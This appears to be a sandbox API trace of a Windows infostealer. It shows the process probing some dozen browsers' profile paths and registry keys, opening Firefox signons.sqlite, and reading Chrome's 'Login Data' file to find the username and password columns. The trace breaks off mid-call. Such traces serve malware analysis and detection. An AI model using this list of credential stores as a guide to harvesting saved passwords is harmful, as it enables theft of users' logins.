CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\p7ap74gw.default", cchWideChar=-1, lpMultiByteStr=0x582468, cbMultiByte=76, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\p7ap74gw.default", lpUsedDefaultChar=0x0) returned 76 [0134.104] NSS_Init () returned 0x0 [0134.510] LoadLibraryW (lpLibFileName="user32") returned 0x75930000 [0134.510] wvsprintfW (in: param_1=0x57e458, param_2="%s\\signons.sqlite", arglist=0x18f2cc | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\p7ap74gw.default\\signons.sqlite") returned 90 [0134.511] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0134.511] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\p7ap74gw.default\\signons.sqlite") returned 1 [0134.516] sqlite3_open16 () returned 0x0 [0134.526] sqlite3_prepare_v2 () returned 0x0 [0134.532] sqlite3_step () returned 0x65 [0134.533] sqlite3_finalize () returned 0x0 [0134.533] sqlite3_close () returned 0x0 [0134.533] LoadLibraryW (lpLibFileName="user32") returned 0x75930000 [0134.534] wvsprintfW (in: param_1=0x57e458, param_2="%s\\logins.json", arglist=0x18f2cc | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\p7ap74gw.default\\logins.json") returned 87 [0134.534] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0134.534] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\p7ap74gw.default\\logins.json") returned 0 [0134.535] LoadLibraryW (lpLibFileName="user32") returned 0x75930000 [0134.535] wvsprintfW (in: param_1=0x57e458, param_2="%s\\%s", arglist=0x18f2c4 | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\p7ap74gw.default\\signons.txt") returned 87 [0134.536] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0134.536] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\p7ap74gw.default\\signons.txt") returned 0 [0134.536] LoadLibraryW (lpLibFileName="user32") returned 0x75930000 [0134.537] wvsprintfW (in: param_1=0x57e458, param_2="%s\\%s", arglist=0x18f2c4 | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\p7ap74gw.default\\signons2.txt") returned 88 [0134.537] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0134.537] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\p7ap74gw.default\\signons2.txt") returned 0 [0134.538] LoadLibraryW (lpLibFileName="user32") returned 0x75930000 [0134.538] wvsprintfW (in: param_1=0x57e458, param_2="%s\\%s", arglist=0x18f2c4 | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\p7ap74gw.default\\signons3.txt") returned 88 [0134.538] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0134.538] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\p7ap74gw.default\\signons3.txt") returned 0 [0134.539] NSS_Shutdown () returned 0x0 [0134.542] LoadLibraryW (lpLibFileName="user32") returned 0x75930000 [0134.542] wvsprintfW (in: param_1=0x57e458, param_2="Profile%i", arglist=0x18f340 | out: param_1="Profile1") returned 8 [0134.543] GetPrivateProfileStringW (in: lpAppName="Profile1", lpKeyName="Path", lpDefault=0x0, lpReturnedString=0x584be0, nSize=0x400, lpFileName="C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" | out: lpReturnedString="") returned 0x0 [0134.543] GetLastError () returned 0x2 [0134.544] SetEnvironmentVariableW (lpName="PATH", lpValue="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 1 [0134.544] FreeLibrary (hLibModule=0x75390000) returned 1 [0134.544] FreeLibrary (hLibModule=0x75390000) returned 1 [0134.557] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0134.557] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\ComodoGroup\\IceDragon\\Setup", pszValue="SetupPath", pdwType=0x0, pvData=0x57cbd8, pcbData=0x18fbb0*=0x104 | out: pdwType=0x0, pvData=0x57cbd8, pcbData=0x18fbb0*=0x104) returned 0x2 [0134.558] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0134.558] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Apple Computer, Inc.\\Safari", pszValue="InstallDir", pdwType=0x0, pvData=0x57cbd8, pcbData=0x18fba4*=0x104 | out: pdwType=0x0, pvData=0x57cbd8, pcbData=0x18fba4*=0x104) returned 0x2 [0134.558] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0134.558] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\K-Meleon", pszValue="CurrentVersion", pdwType=0x0, pvData=0x57cbd8, pcbData=0x18fbac*=0x104 | out: pdwType=0x0, pvData=0x57cbd8, pcbData=0x18fbac*=0x104) returned 0x2 [0134.559] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0134.559] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\mozilla.org\\SeaMonkey", pszValue="CurrentVersion", pdwType=0x0, pvData=0x57cbd8, pcbData=0x18fb94*=0x104 | out: pdwType=0x0, pvData=0x57cbd8, pcbData=0x18fb94*=0x104) returned 0x2 [0134.559] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0134.560] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Mozilla\\SeaMonkey", pszValue="CurrentVersion", pdwType=0x0, pvData=0x57cbd8, pcbData=0x18fb94*=0x104 | out: pdwType=0x0, pvData=0x57cbd8, pcbData=0x18fb94*=0x104) returned 0x2 [0134.560] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0134.560] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Mozilla\\Flock", pszValue="CurrentVersion", pdwType=0x0, pvData=0x57cbd8, pcbData=0x18fbac*=0x104 | out: pdwType=0x0, pvData=0x57cbd8, pcbData=0x18fbac*=0x104) returned 0x2 [0134.561] LoadLibraryW (lpLibFileName="SHELL32") returned 0x76100000 [0134.561] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x57cbd8 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0134.562] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0134.562] StrStrW (lpFirst="C:\\Program Files (x86)", lpSrch="(x86)") returned="(x86)" [0134.563] ExpandEnvironmentStringsW (in: lpSrc="%ProgramW6432%", lpDst=0x57d180, nSize=0x104 | out: lpDst="C:\\Program Files") returned 0x11 [0134.563] LoadLibraryW (lpLibFileName="user32") returned 0x75930000 [0134.563] wvsprintfW (in: param_1=0x57e458, param_2="%s\\NETGATE\\Black Hawk", arglist=0x18fbbc | out: param_1="C:\\Program Files\\NETGATE\\Black Hawk") returned 35 [0134.564] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0134.564] PathFileExistsW (pszPath="C:\\Program Files\\NETGATE\\Black Hawk") returned 0 [0134.564] LoadLibraryW (lpLibFileName="user32") returned 0x75930000 [0134.565] wvsprintfW (in: param_1=0x57e458, param_2="%s\\Lunascape\\Lunascape6\\plugins\\{9BDD5314-20A6-4d98-AB30-8325A95771EE}", arglist=0x18fbc4 | out: param_1="C:\\Program Files (x86)\\Lunascape\\Lunascape6\\plugins\\{9BDD5314-20A6-4d98-AB30-8325A95771EE}") returned 90 [0134.565] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0134.565] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Lunascape\\Lunascape6\\plugins\\{9BDD5314-20A6-4d98-AB30-8325A95771EE}") returned 0 [0134.566] LoadLibraryW (lpLibFileName="SHELL32") returned 0x76100000 [0134.566] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x57d180 | out: pszPath="C:\\Users\\kFT6uTQW\\AppData\\Local") returned 0x0 [0134.567] LoadLibraryW (lpLibFileName="user32") returned 0x75930000 [0134.567] wvsprintfW (in: param_1=0x57e458, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x18f780 | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Local\\Comodo\\Dragon\\User Data\\Default\\Login Data") returned 74 [0134.568] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0134.568] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Local\\Comodo\\Dragon\\User Data\\Default\\Login Data") returned 0 [0134.568] LoadLibraryW (lpLibFileName="user32") returned 0x75930000 [0134.569] wvsprintfW (in: param_1=0x57e458, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x18f77c | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Local\\Comodo\\Dragon\\User Data\\Default\\Web Data") returned 72 [0134.569] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0134.569] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Local\\Comodo\\Dragon\\User Data\\Default\\Web Data") returned 0 [0134.570] LoadLibraryW (lpLibFileName="user32") returned 0x75930000 [0134.570] wvsprintfW (in: param_1=0x57e458, param_2="%s%s\\Login Data", arglist=0x18f77c | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\LocalComodo\\Dragon\\Login Data") returned 55 [0134.570] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0134.570] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\LocalComodo\\Dragon\\Login Data") returned 0 [0134.571] LoadLibraryW (lpLibFileName="user32") returned 0x75930000 [0134.571] wvsprintfW (in: param_1=0x57e458, param_2="%s%s\\Default\\Login Data", arglist=0x18f77c | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\LocalComodo\\Dragon\\Default\\Login Data") returned 63 [0134.572] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0134.572] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\LocalComodo\\Dragon\\Default\\Login Data") returned 0 [0134.572] LoadLibraryW (lpLibFileName="user32") returned 0x75930000 [0134.573] wvsprintfW (in: param_1=0x57e458, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x18f780 | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data\\Default\\Login Data") returned 83 [0134.573] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0134.573] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data\\Default\\Login Data") returned 0 [0134.574] LoadLibraryW (lpLibFileName="user32") returned 0x75930000 [0134.574] wvsprintfW (in: param_1=0x57e458, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x18f77c | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data\\Default\\Web Data") returned 81 [0134.574] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0134.574] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data\\Default\\Web Data") returned 0 [0134.575] LoadLibraryW (lpLibFileName="user32") returned 0x75930000 [0134.575] wvsprintfW (in: param_1=0x57e458, param_2="%s%s\\Login Data", arglist=0x18f77c | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\LocalMapleStudio\\ChromePlus\\Login Data") returned 64 [0134.576] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0134.576] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\LocalMapleStudio\\ChromePlus\\Login Data") returned 0 [0134.576] LoadLibraryW (lpLibFileName="user32") returned 0x75930000 [0134.577] wvsprintfW (in: param_1=0x57e458, param_2="%s%s\\Default\\Login Data", arglist=0x18f77c | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\LocalMapleStudio\\ChromePlus\\Default\\Login Data") returned 72 [0134.577] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0134.577] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\LocalMapleStudio\\ChromePlus\\Default\\Login Data") returned 0 [0134.578] LoadLibraryW (lpLibFileName="user32") returned 0x75930000 [0134.578] wvsprintfW (in: param_1=0x57e458, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x18f780 | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data") returned 74 [0134.578] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0134.578] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data") returned 1 [0134.611] CreateFileW (lpFileName="C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data" (normalized: "c:\\users\\kft6utqw\\appdata\\local\\google\\chrome\\user data\\default\\login data"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0134.612] GetFileSize (in: hFile=0xd4, lpFileSizeHigh=0x18f73c | out: lpFileSizeHigh=0x18f73c*=0x0) returned 0x4800 [0134.612] VirtualAlloc (lpAddress=0x0, dwSize=0x4800, flAllocationType=0x1000, flProtect=0x4) returned 0x230000 [0134.613] ReadFile (in: hFile=0xd4, lpBuffer=0x230000, nNumberOfBytesToRead=0x4800, lpNumberOfBytesRead=0x18f738, lpOverlapped=0x0 | out: lpBuffer=0x230000*, lpNumberOfBytesRead=0x18f738*=0x4800, lpOverlapped=0x0) returned 1 [0134.625] CloseHandle (hObject=0xd4) returned 1 [0134.626] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0134.626] StrStrA (lpFirst="CREATE TABLE logins (origin_url VARCHAR NOT NULL, action_url VARCHAR, username_element VARCHAR, username_value VARCHAR, password_element VARCHAR, password_value BLOB, submit_element VARCHAR, signon_realm VARCHAR NOT NULL, preferred INTEGER NOT NULL, date_created INTEGER NOT NULL, blacklisted_by_user INTEGER NOT NULL, scheme INTEGER NOT NULL, password_type INTEGER, times_used INTEGER, form_data BLOB, date_synced INTEGER, display_name VARCHAR, icon_url VARCHAR, federation_url VARCHAR, skip_zero_click INTEGER, generation_upload_status INTEGER, possible_username_pairs BLOB, UNIQUE (origin_url, username_element, username_value, password_element, signon_realm))+\x04\x06\x17?\x19\x01", lpSrch="(") returned="(origin_url VARCHAR NOT NULL, action_url VARCHAR, username_element VARCHAR, username_value VARCHAR, password_element VARCHAR, password_value BLOB, submit_element VARCHAR, signon_realm VARCHAR NOT NULL, preferred INTEGER NOT NULL, date_created INTEGER NOT NULL, blacklisted_by_user INTEGER NOT NULL, scheme INTEGER NOT NULL, password_type INTEGER, times_used INTEGER, form_data BLOB, date_synced INTEGER, display_name VARCHAR, icon_url VARCHAR, federation_url VARCHAR, skip_zero_click INTEGER, generation_upload_status INTEGER, possible_username_pairs BLOB, UNIQUE (origin_url, username_element, username_value, password_element, signon_realm))+\x04\x06\x17?\x19\x01" [0134.626] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0134.626] StrStrA (lpFirst="origin_url VARCHAR NOT NULL, action_url VARCHAR, username_element VARCHAR, username_value VARCHAR, password_element VARCHAR, password_value BLOB, submit_element VARCHAR, signon_realm VARCHAR NOT NULL, preferred INTEGER NOT NULL, date_created INTEGER NOT NULL, blacklisted_by_user INTEGER NOT NULL, scheme INTEGER NOT NULL, password_type INTEGER, times_used INTEGER, form_data BLOB, date_synced INTEGER, display_name VARCHAR, icon_url VARCHAR, federation_url VARCHAR, skip_zero_click INTEGER, generation_upload_status INTEGER, possible_username_pairs BLOB, UNIQUE (origin_url, username_element, username_value, password_element, signon_realm))+\x04\x06\x17?\x19\x01", lpSrch="UNIQUE") returned="UNIQUE (origin_url, username_element, username_value, password_element, signon_realm))+\x04\x06\x17?\x19\x01" [0134.627] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0134.627] StrStrA (lpFirst="origin_url VARCHAR NOT NULL", lpSrch="origin_url") returned="origin_url VARCHAR NOT NULL" [0134.627] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0134.628] StrStrA (lpFirst="origin_url VARCHAR NOT NULL", lpSrch="username_value") returned 0x0 [0134.628] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0134.628] StrStrA (lpFirst=" action_url VARCHAR", lpSrch="username_value") returned 0x0 [0134.628] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0134.629] StrStrA (lpFirst=" username_element VARCHAR", lpSrch="username_value") returned 0x0 [0134.629] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0134.629] StrStrA (lpFirst=" username_value VARCHAR", lpSrch="username_value") returned="username_value VARCHAR" [0134.629] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0134.630] StrStrA (lpFirst="origin_url VARCHAR NOT NULL", lpSrch="password_value") returned 0x0 [0134.630] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0134.630] StrStrA (lpFirst=" action_url VARCHAR", lpSrch="password_value") returned 0x0 [0134.630] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0134.631] StrStrA (lpFirst=" username_element VARCHAR", lpSrch="password_value") returned 0x0 [0134.631] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0134.631] StrStrA (lpFirst=" username_value VARCHAR", lpSrch="password_value") returned 0x0 [0134.631] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0134.632] StrStrA (lpFirst=" password_element VARCHAR", lpSrch="password_value") returned 0x0 [0134.632] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0134.632] StrStrA (lpFirst=" password_value BLOB", lpSrch="password_value") returned="password_value BLOB" [0134.633] VirtualFree (lpAddress=0x230000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.633] LoadLibraryW (lpLibFileName="user32") returned 0x75930000 [0134.634] wvsprintfW (in: param_1=0x57e458, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x18f780 | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Local\\Nichrome\\User Data\\Default\\Login Data") returned 69 [0134.634] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0134.634] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Local\\Nichrome\\User Data\\Default\\Login Data") returned 0 [0134.635] LoadLibraryW (lpLibFileName="user32") returned 0x75930000 [0134.635] wvsprintfW (in: param_1=0x57e458, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x18f77c | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Local\\Nichrome\\User Data\\Default\\Web Data") returned 67 [0134.635] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0134.636] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Local\\Nichrome\\User Data\\Default\\Web Data") returned 0 [0134.636] LoadLibraryW (lpLibFileName="user32") returned 0x75930000 [0134.637] wvsprintfW (in: param_1=0x57e458, param_2="%s%s\\Login Data", arglist=0x18f77c | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\LocalNichrome\\Login Data") returned 50 [0134.637] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0134.637] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\LocalNichrome\\Login Data") returned 0 [0134.637] LoadLibraryW (lpLibFileName="user32") returned 0x75930000 [0134.638] wvsprintfW (in: param_1=0x57e458, param_2="%s%s\\Default\\Login Data", arglist=0x18f77c | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\LocalNichrome\\Default\\Login Data") returned 58 [0134.638] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0134.638] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\LocalNichrome\\Default\\Login Data") returned 0 [0134.639] LoadLibraryW (lpLibFileName="user32") returned 0x75930000 [0134.639] wvsprintfW (in: param_1=0x57e458, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x18f780 | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Local\\RockMelt\\User Data\\Default\\Login Data") returned 69 [0134.640] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0134.640] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Local\\RockMelt\\User Data\\Default\\Login Data") returned 0 [0134.640] LoadLibraryW (lpLibFileName="user32") returned 0x75930000 [0134.641] wvsprintfW (in: param_1=0x57e458, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x18f77c | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Local\\RockMelt\\User Data\\Default\\Web Data") returned 67 [0134.641] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0134.641] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Local\\RockMelt\\User Data\\Default\\Web Data") returned 0 [0134.642] LoadLibraryW (lpLibFileName="user32") returned 0x75930000 [0134.642] wvsprintfW (in: param_1=0x57e458, param_2="%s%s\\Login Data", arglist=0x18f77c | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\LocalRockMelt\\Login Data") returned 50 [0134.642] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0134.642] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\LocalRockMelt\\Login Data") returned 0 [0134.643] LoadLibraryW (lpLibFileName="user32") returned 0x75930000 [0134.643] wvsprintfW (in: param_1=0x57e458, param_2="%s%s\\Default\\Login Data", arglist=0x18f77c | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\LocalRockMelt\\Default\\Login Data") returned 58 [0134.644] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0134.644] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\LocalRockMelt\\Default\\Login Data") returned 0 [0134.644] LoadLibraryW (lpLibFileName="user32") returned 0x75930000 [0134.644] wvsprintfW (in: param_1=0x57e458, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x18f780 | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Local\\Spark\\User Data\\Default\\Login Data") returned 66 [0134.645] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0134.645] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Local\\Spark\\User Data\\Default\\Login Data") returned 0 [0134.645] LoadLibraryW (lpLibFileName="user32") returned 0x75930000 [0134.646] wvsprintfW (in: param_1=0x57e458, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x18f77c | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Local\\Spark\\User Data\\Default\\Web Data") returned 64 [0134.646] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0134.646] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Local\\Spark\\User Data\\Default\\Web Data") returned 0 [0134.647] LoadLibraryW (lpLibFileName="user32") returned 0x75930000 [0134.647] wvsprintfW (in: param_1=0x57e458, param_2="%s%s\\Login Data", arglist=0x18f77c | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\LocalSpark\\Login Data") returned 47 [0134.648] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0134.648] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\LocalSpark\\Login Data") returned 0 [0134.648] LoadLibraryW (lpLibFileName="user32") returned 0x75930000 [0134.648] wvsprintfW (in: param_1=0x57e458, param_2="%s%s\\Default\\Login Data", arglist=0x18f77c | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\LocalSpark\\Default\\Login Data") returned 55 [0134.649] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0134.649] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\LocalSpark\\Default\\Login Data") returned 0 [0134.649] LoadLibraryW (lpLibFileName="user32") returned 0x75930000 [0134.650] wvsprintfW (in: param_1=0x57e458, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x18f780 | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Local\\Chromium\\User Data\\Default\\Login Data") returned 69 [0134.650] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0134.650] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Local\\Chromium\\User Data\\Default\\Login Data") returned 0 [0134.651] LoadLibraryW (lpLibFileName="user32") returned 0x75930000 [0134.651] wvsprintfW (in: param_1=0x57e458, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x18f77c | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Local\\Chromium\\User Data\\Default\\Web Data") returned 67 [0134.651] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0134.652] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Local\\Chromium\\User Data\\Default\\Web Data") returned 0 [0134.652] LoadLibraryW (lpLibFileName="user32") returned 0x75930000 [0134.652] wvsprintfW (in: param_1=0x57e458, param_2="%s%s\\Login Data", arglist=0x18f77c | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\LocalChromium\\Login Data") returned 50 [0134.653] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0134.653] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\LocalChromium\\Login Data") returned 0 [0134.653] LoadLibraryW (lpLibFileName="user32") returned 0x75930000 [0134.654] wvsprintfW (in: param_1=0x57e458, param_2="%s%s\\Default\\Login Data", arglist=0x18f77c | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\LocalChromium\\Default\\Login Data") returned 58 [0134.654] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0134.654] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\LocalChromium\\Default\\Login Data") returned 0 [0134.655] LoadLibraryW (lpLibFileName="user32") returned 0x75930000 [0134.655] wvsprintfW (in: param_1=0x57e458, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x18f780 | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Local\\Titan Browser\\User Data\\Default\\Login Data") returned 74 [0134.656] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0134.656] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Local\\Titan Browser\\User Data\\Default\\Login Data") returned 0 [0134.656] LoadLibraryW (lpLibFileName="user32") returned 0x75930000 [0134.657] wvsprintfW (in: param_1=0x57e458, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x18f77c | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Local\\Titan Browser\\User Data\\Default\\Web Data") returned 72 [0134.657] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0134.657] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Local\\Titan Browser\\User Data\\Default\\Web Data") returned 0 [0134.658] LoadLibraryW (lpLibFileName="user32") returned 0x75930000 [0134.658] wvsprintfW (in: param_1=0x57e458, param_2="%s%s\\Login Data", arglist=0x18f77c | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\LocalTitan Browser\\Login Data") returned 55 [0134.658] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0134.658] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\LocalTitan Browser\\Login Data") returned 0 [0134.659] LoadLibraryW (lpLibFileName="user32") returned 0x75930000 [0134.659] wvsprintfW (in: param_1=0x57e458, param_2="%s%s\\Default\\Login Data", arglist=0x18f77c | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\LocalTitan Browser\\Default\\Login Data") returned 63 [0134.660] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0134.660] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\LocalTitan Browser\\Default\\Login Data") returned 0 [0134.660] LoadLibraryW (lpLibFileName="user32") returned 0x75930000 [0134.660] wvsprintfW (in: param_1=0x57e458, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x18f780 | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Local\\Torch\\User Data\\Default\\Login Data") returned 66 [0134.661] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0134.661] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Local\\Torch\\User Data\\Default\\Login Data") returned 0 [0134.661] LoadLibraryW (lpLibFileName="user32") returned 0x75930000 [0134.662] wvsprintfW (in: 